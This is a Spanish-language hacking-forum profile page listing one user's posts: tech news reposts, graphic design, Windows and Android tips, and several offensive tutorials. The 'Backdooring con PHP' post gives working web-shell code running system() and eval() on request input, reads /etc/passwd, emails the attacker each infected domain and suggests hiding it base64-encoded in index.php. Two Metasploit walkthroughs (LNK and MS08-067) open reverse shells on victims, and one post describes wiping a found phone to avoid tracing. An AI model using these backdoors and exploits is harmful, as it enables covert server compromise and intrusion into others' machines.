Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Payasako

Páginas: [1] 2
1
Presentaciones / De nuevo por aquí..
« en: Septiembre 22, 2018, 11:39:50 am »
Hola qué tal no sé si se acordarán de mi, soy antiguo usuario de underc0de (Desde 2014, exactamente), dejé este mundillo por problemillas que tuve con la justicia, y ahora que ya pasaron varios años y vuelvo a disponer de un poco de tiempo libre, vuelvo a retomar las riendas de la comunidad, espero encontrarme con algún conocido de hace tiempo jajaja

2
Diseño Gráfico / Firmita que me solté
« en: Noviembre 04, 2016, 12:31:20 pm »
Hace una semana o así descargué Photoshop, yo antes editaba con Gimp, y he estado trasteando esto y me he soltado una firma nueva :P Y Quiero compartirla con el foro



Saludos niggis

3
Hola buenas gente de Underc0de, hace tiempo cambié el disco duro de mi ordenador a uno Hitachi de 160Gb y le instalé ubuntu.. Ahora quiero formatear el disco duro, pero me salta un error desde la aplicación "Utilidad de Discos".

Cuando le doy a "Formatear unidad" y doy permiso para que se pueda ejecutar la acción me salta el siguiente error: "Ocurrió un error al realizar una operación en <<Disco duro de 160GB>> : El diapositivo está ocupado."

Y Más abajo sale un desplegable que dice: One or more partitions are busy on /dev/sda

El caso es que ya he probado de todo, hasta con GParted, ¿Alguna solución?

4
Dudas y pedidos generales / Rastreo del movil
« en: Abril 04, 2016, 04:18:17 pm »
Ayer andando por la calle me encontre un telefono movil LG Magna y le quite la tarjeta SIM y lo Formatee, tendre el movil apagado un tiempo para que no lo localicen, ¿Se podria de alguna forma rastrear a traves del IMEI incluso estando apagado?

5


La famosa distribución GNU/Linux llamada Kali, muy conocida por su utilidad en el entorno de la seguridad, ya que contiene un sin fin de herramientas para realizar auditorías de seguridad, ahora llega a su segunda versión. Kali Linux 2.0 ya tiene puesta la fecha de lanzamiento y ésta es el 11 de agosto de este año.

Desde que en 2013 los desarrolladores de Backtrack decidieran dejar este proyecto en su versión 5r3 que estaba basada en Ubuntu, para darle un vuelco al proyecto y pasar a desarrollar Kali, este basado en Debian para mejorar su rendimiento y con un gran número de mejoras. Pues bien, este año veremos la aparición de la 2.0 después de casi 2 años…

Kali Linux 2.0 traerá mejoras como su interfaz gráfica, totalmente rediseñada para optimizar al máximo el trabajo, con nuevos menús y nuevas categorías para ordenar las numerosas herramientas que se incluyen. Igualmente pasa con las actualizaciones, que ahora serán semanales para mantenernos al día y su instalación será igual de sencilla que hasta ahora.

El framework Metasploit también ha tenido mejoras, al que le han añadido Ruby 2.0 de manera nativa para acelerar al máximo los tiempos de carga. Igualmente se incluirá un sistema de notificaciones en el escritorio para no perder detalle e incluso se han integrado mejores herramientas para grabar la pantalla y realizar videotutoriales.

Fuente: LinuxAdictos

6
Acusado de un delito contra la intimidad de las personas y otro de violencia de género,
La víctima denunció los hechos en la comisaría.


El Juzgado de Instrucción número 2 de Jaén ha arrestado a un joven de 20 años por instalar una aplicación 'espía' en el móvil de su pareja. El joven, tras declarar en comisaría, ha sido puesto en libertad y ha pasado a disposición judicial acusado de un delito contra la intimidad de las personas y otro de violencia de género.

Esta aplicación 'espía' que instaló en el móvil de su pareja antes de regalárselo, le permitía acceder a las conversaciones de whatsapp y a las redes sociales a las que la víctima estaba inscrita e incluso activar el micrófono o la cámara de forma remota para poder escuchar y ver lo que ocurría alrededor del teléfono.

Fuentes policiales confirmaron a Europa Press que la aplicación era "muy difícil" de detectar a simple vista ya que permanecía oculta y además rastreaba todos los movimientos de la joven tanto en la red como en su vida diaria.

El joven, vecino de la capital jiennense al igual que la víctima, admitió en su declaración haber sido el responsable de la instalación de esta aplicación 'espía'.

Según informa la Comisaría Provincial en un comunicado, la investigación se inició a raíz de la denuncia de la víctima, una mujer de 27 años, que, tras nueve meses de relación, se personó en dependencias policiales con sospechas de que su pareja le estaba controlando porque no le parecía "normal" que él supiera el lugar y determinadas situaciones que le sucedían.

Fuente: Telecinco Noticias

7

Windows XP sigue vivo y coleando gracias al ejército de EE UU
En abril de 2014, Microsoft dejó de actualizar Windows XP, certificando así la muerte de su sistema operativo. No obstante, más de un año después, la Marina estadounidense utiliza aún XP y disfruta de actualizaciones gracias a un millonario contrato con la multinacional.

Windows XP ha muerto, pero no para todos. Microsoft anunció que Windows XP pasaba a mejor vida en abril de 2014. El sistema operativo dejaría de recibir actualizaciones y, desde ese momento, se convirtió en un verdadero peligro. Sin embargo, hay quien ha logrado que Microsoft siga enviándole actualizaciones. Eso sí, pasando antes por caja y gracias a su influencia.

Ese cliente VIP no es otro que la Marina de los Estados Unidos, que acaba de firmar un contrato con Microsoft por valor de más de 9 millones de dólares (unos 8 millones de euros) para seguir recibiendo parches de seguridad para Windows XP.

El contrato es ampliable hasta 2017 y su valor podría ascender hasta los 30 millones de dólares (cerca de 27 millones de euros). De esta forma, el brazo marítimo del ejército estadounidense se asegura que los equipos que aún funcionan con el viejo sistema operativo de Microsoft no se conviertan en un verdadero problema de seguridad.A pesar de iniciar el abandono de XP en 2013, la Marina de los Estados Unidos tendría aún unos 100.000 equipos con Windows XP. Mientras gozan de un trato especial por parte de Microsoft para seguir utilizando XP sin problemas, la Marina continuará su migración a otro sistema operativo.

Fuente: TecnoXplora
Opinión personal: Yo era uno de los usuarios que usaba Windows XP antes de finalizar, pero el mismo dia de la finalización me pase a usar Windows 7, ahora creo que esto de que el sistema operativo siga recibiendo actualizaciones, me parece perfecto, ya que establecimientos públicos (Empresas, colegios, locales..) usan este sistema operativo.

8
Off Topic / Tu ejemplo a seguir..
« en: Julio 02, 2015, 08:09:45 am »
Hola, que tal a todos hago este post para comentar quien es tu "ejemplo a seguir" del foro.. Es decir, algun o algunos usuarios que te llamen la atención por sus habilidades.

A Mí de siempre me han llamado la atención: @Expermicid, @ANTRAX, @blackdrake & @Snifer. A Ellos porque son unos máquinas a la hora de ayudar a los usuarios, y sus respuestas más de una vez me han dejado en plan: "No entendí nada" un increible conocimiento.

También menciono a mi bro, @z4nutsec que es un máquina en la programación y un gran emprendedor en esto de la Seguridad Informática, que con su blog está consiguiendo encaminarse en lo que realidad quiere ser, ahora es pequeñito.. Imagináos dentro de 5 años!! Gracias por ayudarme siempre que lo he necesitado bro.

9
Galería / Otro trabajo..
« en: Junio 30, 2015, 02:34:40 pm »
Aquí hice otro diseño, he cambiado de color a las letras P,S & K porque me conocen como PskSecurity y tal, espero que les guste.



Esta si la coloco de firma, que me gusta más

10
Galería / Otro de mis diseños..
« en: Junio 25, 2015, 11:10:31 am »
Hacía ya unos meses que no diseñaba algo en condiciones, y lo que he diseñado hoy ha sido pura casualidad.. Buscando en google me he encontrado con un fondo "Jester" y bueno, pues la he recortado un poco, he bordeado las esquinas y le he aplicado un desenfoque gaussiano, y el texto le he añadido un degradado blanco/gris claro y un enfoque con sombra paralela -90º y reducción de opacidad..

Después de todo eso ha salido esto:


¡Espero que les guste, Underc0deanos! y espero vuestras críticas.

11
Seguridad web y en servidores / Backdooring con PHP.
« en: Junio 13, 2015, 08:50:15 pm »
Hola Underc0deanos, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citar
una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código: PHP
  1. <?php
  2. system('comando');
  3. ?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código: PHP
  1. <?php
  2. $var = @system($_GET['ejec']);
  3. ?>

Podriamos entrar desde:
Citar
url.com/archivoinfectado.php?ejec=comando

un ejemplo así:
Citar
url.com/archivoinfectado.php?ejec=cat /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget url.com/lol.txt (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
  3. ?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
  3. ?>

Mostrará la ruta de el script, es decir si estamos en web.com/hola/lol.php te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
  3. ?>

Te mostrará en la pantalla Estamos en el dominio http://web.com


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código: PHP
  1. <?php
  2. mail('[email protected]', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
  3. ?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido “Hola
mucho gusto soy y una IP”.

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código: PHP
  1. <?php
  2. $var = eval(echo 'hola underc0de';);
  3. ?>
Si lo ejecutamos veremos que nos mostrará: hola underc0de. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código: PHP
  1. <?php
  2. $var eval($_GET['ejec']);
  3. ?>

lo usamos de está forma:
Citar
url.com/archivoinfectado.php?ejec=echo 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código: PHP
  1. <?php
  2. $var = system($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues encriptamos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código: PHP
  1. <?php
  2. $var = eval($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('[email protected]', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.
Viejo pdf

12
Seguridad / ¿Es necesario un antivirus en tu ordenador?..
« en: Junio 08, 2015, 09:46:21 am »


¿Después de un tiempo desde que lo compraste, tu ordenador va más lento? La respuesta típica es: “claro, debes tenerlo lleno de virus”. Error, probablemente no tengas ningún virus, pero sí puedes tenerlo lleno de cosas innecesarias y, entre ellas, el antivirus podría ser una.

Generalizar en este tipo de temas tiene poco sentido, puesto que el nivel de experiencia y conocimientos de cada usuario es el que determina la utilidad real, e incluso la necesidad, de un software para ordenador. En este caso nos centramos en los antivirus y, antes de ahondar en el tema, sí que en cualquier caso se puede asegurar que “no es necesario tener un antivirus en el ordenador”. ¿Es conveniente? Sí, probablemente, aunque a continuación puntualizaremos en qué casos sí y en cuales no, y es que a algunos usuarios, incluso, se les debe advertir de que sería más conveniente para ellos no hacer uso de un antivirus.

Como adelantábamos, antes de ahondar en el tema es necesario recordar que no, no todos los usuarios tenemos el mismo nivel de conocimientos y, por lo tanto, cada cual sabrá cuáles son sus posibilidades frente al ordenador, por lo que la responsabilidad de los posibles problemas derivados de un mal uso del ordenador son, única y exclusivamente, del propio usuario.

Los antivirus consumen recursos, reducen el rendimiento
Los componentes de hardware de nuestro ordenador, las piezas internas que hacen posible su funcionamiento, tienen unos límites. El hardware está preparado, en función de sus características técnicas, para hacer funcionar de forma simultánea una cantidad limitada de software y, ¡sorpresa! aunque hay quien no lo sabe, un antivirus no deja de ser un programa, es decir, software. Por lo tanto, aunque depende de cada producto de software de tipo antivirus el que sea mayor o menor el consumo de recursos, en todos los casos nos encontramos con una pérdida de rendimiento como consecuencia de la utilización de un antivirus.

Sin conexión a Internet, ¿para qué quiero un antivirus?
Un ordenador dedicado a ofimática (documentos de texto, hojas de cálculo y similares) que no están siquiera conectados a Internet. ¿Para qué queremos entonces tener un antivirus instalado? Teniendo en cuenta lo explicado justo en el punto anterior, el consumo de recursos derivado de la utilización de un antivirus es un aspecto -negativo, obviamente- que debemos tener en cuenta en la “balanza” que nos lleve a decidirnos entre usar un antivirus o no hacerlo. ¿De dónde llegan los virus? Generalmente, de Internet. Luego, si no estamos conectados a Internet, ¿para qué queremos estar consumiendo recursos de nuestro ordenador y perdiendo rendimiento por culpa del antivirus? Aunque, cuidado, porque un dispositivo de almacenamiento externo como un disco duro, una tarjeta de memoria o un “pen drive” puede tener un virus, aunque no es lo más común.

Sólo navegamos por “sitios web de confianza”
Aquí es donde entran los “conocimientos”. Una gran cantidad de usuarios acostumbra a utilizar el ordenador, en cuanto a la navegación por Internet, para visitar siempre los mismos sitios web, y todos ellos “de confianza”. Además, apenas descarga archivos y, cuando lo hace, provienen todos ellos también de sitios web de confianza. Si hacemos este tipo de uso con nuestro ordenador, ¿para qué vamos a utilizar un antivirus, si las páginas web que visitamos ya se encargan de mantener con un alto nivel de protección los archivos que intercambian con nosotros?

No es mejor prevenir que curar, no siempre
Por último tenemos el caso de los que utilizan el ordenador “sin límites” navegando por todo tipo de páginas web y con un riesgo de “infección” medio. Es decir, el caso de la mayor parte de los usuarios de ordenador conectado a Internet. En este caso, y probablemente sólo en este, tiene sentido tener un antivirus instalado en nuestro ordenador. Ahora bien, instalar un antivirus es seguir la filosofía del “mejor prevenir que curar”, cuando no siempre es la mejor idea.

Fuente: AdslZone.Net

13
Windows / Accediendo a God Mode en Windows 7.
« en: Junio 07, 2015, 12:45:45 pm »



Supongo que esto lo sabrán ya muchos, pero vengo a postear para aquel que aún no lo haya probado y quiera experimentarlo.

Esto nos puede ser útil en el día a día, ya que nos permite acceder a todos los paneles de control del sistema desde una sola carpeta. Sobre todo para los administradores a la hora de hacer un "troubleshooting" por ejemplo.

Primero crearemos un acceso a un panel en el que tenemos todos los accesos de configuraciones a nuestro Panel de Control. Luego tendremos que crear una carpeta (da igual donde la creemos) la puedes poner en el Escritorio, y le pones de nombre a la carpeta:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Y Veremos como cambia el icono de la carpeta por uno igual que el de Panel de Control, haciendo x2click entraremos al Modo Dios.

14

Fue creada por Tim Berners-Lee usando un computador NeXT, y su función era informar sobre la nueva y emocionante World Wide Web.

La World Wide Web comenzó a existir en 1991, y a más de 20 años de su creación, el primer sitio web del mundo está almacenado por la W3C, que lo conserva para que recordemos la historia. Fue creado por Tim Berners-Lee usando un computador NeXT, y su función era informar sobre la nueva y emocionante World Wide Web.

Los visitantes podían aprender más sobre el proyecto, cosas sobre el hipertexto, detalles técnicos para crear una página web, y una explicación de cómo buscar información en la web (algo complicado porque no había buscadores). Por esos tiempos, los únicos que tenían un navegador eran Berners-Lee y sus colegas del CERN, así que la primera página web no tenía mucha difusión que digamos.

El primer gran paso para masificarla se dio recién en 1993, debido al lanzamiento del navegador Mosaic. Para entonces, ya se habían instalado algunos servidores web más y varias universidades se habían sumado. La versión guardada no es exactamente la original de 1991, porque esa se perdió. El CERN explica que la versión que tenemos hoy corresponde a 1992, y que por esos tiempos el sitio se actualizaba diariamente para agregar información sobre el desarrollo del proyecto de la WWW.

En 1994, Berners Lee fundó el Wordl Wide Web Consortium (W3C) en el MIT en Estados Unidos para asegurar un estándar, que permitiera que sitios diferentes funcionaran de la misma manera. La versión de 1992 nos muestra cómo era la web entonces, sin imágenes por ejemplo. Es raro pensar que la WWW no lleva tanto tiempo en el mundo, y el enorme desarrollo que ha tenido desde sus inicios.

La primera página del mundo, Enlace: http://www.w3.org/History/19921103-hypertext/hypertext/WWW/TheProject.html
Fuente: FayerWayer

15
Windows / Optimizando Windows 7 con ReadyBoost.
« en: Abril 02, 2015, 10:41:06 am »

Hola muy buenas usuarios de Underc0de, hoy les traigo una aplicación que sirve para optimizar nuestro Windows 7, llamada ReadyBoost.

Conecte una unidad flash o una tarjeta USB y permita que ReadyBoost la use. ReadyBoost tiene como función ayudar cuando la memoria de su equipo funciona con lentitud. La poca memoria puede hacer que su equipo funcione con lentitud porque Windows, que necesita lugar para almacenar datos, recurre al disco duro. La memoria flash ofrece una alternativa más veloz.

ReadyBoost funciona con la mayoría de los dispositivos de almacenamiento flash. En Windows 7, puede manejar más memoria flash e incluso varios dispositivos (hasta ocho, con un máximo de 256 gigabytes (GB) de memoria adicional).


Yo ya lo puse en mi portátil y va mucho más rapido que antes.
Fuente: Microsoft.windows.com

16
Android / Liberar espacio en tu diapositivo Android desde pc.
« en: Febrero 17, 2015, 06:34:06 pm »
Bueno, en este tutorial voy a enseñar a Liberar algo de espacio en tu diapositivo Android, simplemente distribuyendo archivos en la Tarjeta SD "Card" y nuestra memoria interna del diapositivo "Phone"..

Ok, primero conectaremos nuestro teléfono a nuestro pc, conexión USB, y iremos al pc, Inicio >> Documentos Y Clickamos en Equipo y luego en el nombre de tu Diapositivo, (Yo usaré un Samsung Galaxy Trend Plus)


Ahora iremos a "Phone" y seleccionaremos los archivos que queramos pasar a la tarjeta SD, Copiamos y lo pegamos en la tarjeta SD, En el directorio "Card"

Cuando tengamos eso hecho, y se hayan copiado las carpetas a "Card" Podemos borrar las originales de nuestro "Phone" y así liberar algo de espacio.. La barra ahora saldría de color Azul, que significa que hay más espacio disponible.


Preguntas:
 
Citar
¿No se generaran errores? Osea puedes mover algo que el dispositivo no busque en la SD.
- Errores se pueden generar, sí, pero si tu mismo conoces el contenido de cada carpeta podrás mover, en el diapositivo tambien se quedan carpetas antiguas de programas ya borrados que ocupan espacio. 

PD: Hice el tutorial liberando unos 50mb pero se pueden llegar a liberar hasta gbs.
Saludos!

17

La Guardia Civil imputa a un menor de edad el ataque informático a más de 75.000 ordenadores

El menor, un autodidacta informático, consiguió evadir protocolos de seguridad considerados como infranqueables. Tras controlar más de 75.000 ordenadores repartidos por todo el mundo de internautas, lanzó un ataque masivo de más de doce millones de visitas, a una página web prestigiosa de la seguridad informática.

La Guardia Civil, en el marco de la operación “CANDELARIA”, desarrollada en Cataluña, han imputado a un menor de edad, residente en Tenerife, como presunto autor de un delito de Daños en Sistemas Informáticos, al haber “infectado” miles de ordenadores ubicados en distintos países, con el objetivo de dominarlos y lanzar ataques masivos a determinadas páginas web, como reto personal para demostrar la vulnerabilidad de esos portales.

Citar
Las investigaciones se iniciaron tras recibir una denuncia del Administrador de la página web www.elhacker.net en la que manifestaba que su página había quedado anulada durante varios días como consecuencia de un incremento masivo de visitas, muy por encima de lo habitual, y seguramente provocadas con esta intención, lo que se conoce como ataque DDos (Distributed Denial of Service).

Los contenidos de esta página, así como la gran mayoría de las personas que colaboran en ella, programadores y administradores de sistemas, tienen por objeto contribuir a extender sus conocimientos y experiencias en torno a la seguridad de las redes en distintos ámbitos, tanto particulares como empresariales.

El menor, que utilizaba el nick "n3ptuno", no poseía ningún tipo de formación relacionada con la informática ni con la programación, cosa que no lo detuvo para ir desarrollando sus conocimientos de forma autodidacta a partir de los 13 años.
Había desarrollado un “virus” aprovechándose de los fallos de seguridad en el protocolo UDP (uno de los canales de información en la red), para infectar los PCs. De esta manera, conseguía dominar los ordenadores de los internautas y así iniciar, cuando él lo decidiese, visitas masivas a las páginas elegidas. Además de la web cuyo Administrador interpuso la denuncia, la Guardia Civil, pudo constatar ataques en los que se estaba llevando a cabo el mismo procedimiento a otras paginas, fundamentalmente a foros y servidores dedicados al juego denominado San Andreas..

Infección de los ordenadores (Zombies):
El menor colgaba un vídeo en youtube con frases atractivas para captar la atención del internauta, de esta forma conseguía que el usuario se descargarse el contenido y automáticamente resultaba infectado.

Este virus tenía la peculiaridad de poder propagarse por conducto de programas tan extendidos como Messenger, Fotolog, etc.

Una vez infectados con el virus, el menor pasaba a dominar los PCs a su antojo con la intención de realizar visitas a la misma vez, a las páginas que quería atacar, colapsando los servidores de las mismas.

Un ejemplo de ello, fue la página www.elhacker.net, que sufrió en pocos minutos más de doce millones de visitas simultáneas, cuando el promedio ordinario oscilaba en unas cien mil.

Mediante esta operación había conseguido controlar más de 75.000 ordenadores, El menor fue puesto a disposición de la Fiscalía de Menores de Santa Cruz de Tenerife.

Fuente: ElHacker.Net

Publicación de el periódico "ElMundo"
http://www.elmundo.es/elmundo/2009/11/26/navegante/1259238023.html
Publicación de "ABC"
http://www.abc.es/20091126/nacional-islas-baleares/menor-tenerife-imputado-ataque-200911261636.html
Publicación de "ElPaís"
http://sociedad.elpais.com/sociedad/2009/11/26/actualidad/1259190010_850215.html

Comentario: He publicado esto porque "n3ptun0" era un viejo usuario del foro de Hacking & Seguridad "Most-Security", y es vieja esta noticia, pero me ha parecido interesante porque a mí me echaron la culpa de atacar la web elhacker.net, me he quedado helado cuando he visto esto por ahí.

PD: La noticia es vieja, pero es una web conocida y me pareció interesante publicarlo.

18
Bugs y Exploits / Metasploit [Explotar Vulnerailidad LNK]
« en: Febrero 17, 2015, 06:07:57 pm »
Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

Primero hay que actualizar Metasploit.
Código: Text
  1. #msfupdate

Luego configuramos Metasploit como sigue:
Código: Text
  1. msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
  2.  

Luego en el navegador de la PC víctima visitamos la siguiente URL:
Código: Text
  1. \192.168.0.33QueHeTwEW

Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.

Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
Código: Text
  1. msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254

Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

Bueno espero que os haya ayudado. ¡Saludos!

19
Bugs y Exploits / Metasploit | Penetrar una pc. [Exploit]
« en: Febrero 17, 2015, 06:06:43 pm »

Metasploit | Penetrar una pc.

En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: www.metasploit.com/download/

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citar
use exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citar
set RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citar
set payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citar
set LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citar
exploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)

20

Se ha descubierto una vulnerabilidad en la funcionalidad de Android Wi-Fi Direct, que permite establecer una conexión directa entre dispositivos compatibles y sin intermediarios, es decir, sin un punto de acceso intermedio.

Además de dispositivos móviles, hay impresoras, cámaras y computadoras que usan Wi-Fi Direct para hacer una conexión peer-to-peer sin router inalámbrico.

El bug en cuestión, que afecta a muchos dispositivos con Android que están buscando otros productos con Wi-Fi Direct, se explota en forma remota a través de una denegación de servicio (DoS). Un atacante puede falsificar y enviar un paquete de respuesta de sondeo específicamente diseñado, hecho que produciría el reinicio del subsistema Dalvik de Android, debido a una excepción en la clase WiFiMonitor que no puede ser manejada, tal como explica el reporte de la vulnerabilidad.

Para ser más específicos, si el atacante envía un evento wpa_supplicant malformado, es la clase WifiP2PDevice la que lanza una excepción de tipo IllegalArgument Exception, que a su vez colapsa el sistema, al no poder ser manejada.
Según The Hacker News, este bug en Android Wi-Fi Direct afecta a varios dispositivos Android:
* Nexus 5 – Android 4.4.4
* Nexus 4 – Android 4.4.4
* LG D806 – Android 4.2.2
* Samsung SM-T310 – Android 4.2.2
* Motorola RAZR HD – Android 4.1.2

Core Security la reportó inicialmente a Google el 26 de septiembre pasado, pero el equipo de seguridad de Android la clasificó como de baja severidad, y explicó en repetidas ocasiones que no tienen tiempo en sus planes para lanzar un parche. Por eso, los investigadores han decidido hacerla pública.

The Register concuerda con Google en cuanto a la clasificación del bug, ya que está limitado a períodos cortos de tiempo en los que el dispositivo Android esté escaneando en busca de otros equipos con Wi-Fi Direct, además de proximidad geográfica. De hecho, el atacante tiene que estar cerca para enviar los datos malformados a la víctima. Y aun así, sostiene, su impacto está limitado a un reinicio.

De todas formas, considerando que las vulnerabilidades son algo de los más frecuente últimamente, te recomendamos leer nuestra Guía de Seguridad en Android para que tu dispositivo esté protegido.

Fuente: SeguridadPc

Páginas: [1] 2